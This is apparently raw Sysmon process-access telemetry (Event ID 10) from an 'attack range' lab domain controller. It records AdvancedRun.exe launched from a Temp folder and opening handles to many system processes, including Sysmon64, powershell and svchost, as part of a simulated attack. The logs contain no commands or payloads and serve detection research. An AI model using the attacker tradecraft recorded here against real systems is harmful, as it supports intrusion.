10341000x80000000000000004015455Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE61-61EA-B805-000000002702}4372C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004015454Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE61-61EA-B705-000000002702}5548C:\Windows\System32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004015453Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE2D-61EA-B005-000000002702}108C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004015452Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE2D-61EA-AF05-000000002702}5296C:\Windows\System32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004015451Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-F392-61EA-4B04-000000002702}948C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004015450Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-F392-61EA-4A04-000000002702}5408C:\Program Files\Internet 
Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004015449Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-E497-61EA-F401-000000002702}2136C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004015448Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004015447Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-E491-61EA-F201-000000002702}3896C:\Program 
Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004015446Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB6F-61EA-B100-000000002702}2348C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004015445Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB13-61EA-9A00-000000002702}5612C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004015444Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB12-61EA-9900-000000002702}5508C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004015443Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB12-61EA-9700-000000002702}5364C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004015442Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB11-61EA-9500-000000002702}428C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004015441Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-9000-000000002702}3336C:\Windows\System32\taskhostw.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004015440Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8F00-000000002702}4948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004015439Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8E00-000000002702}4912C:\Windows\System32\sihost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004015438Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
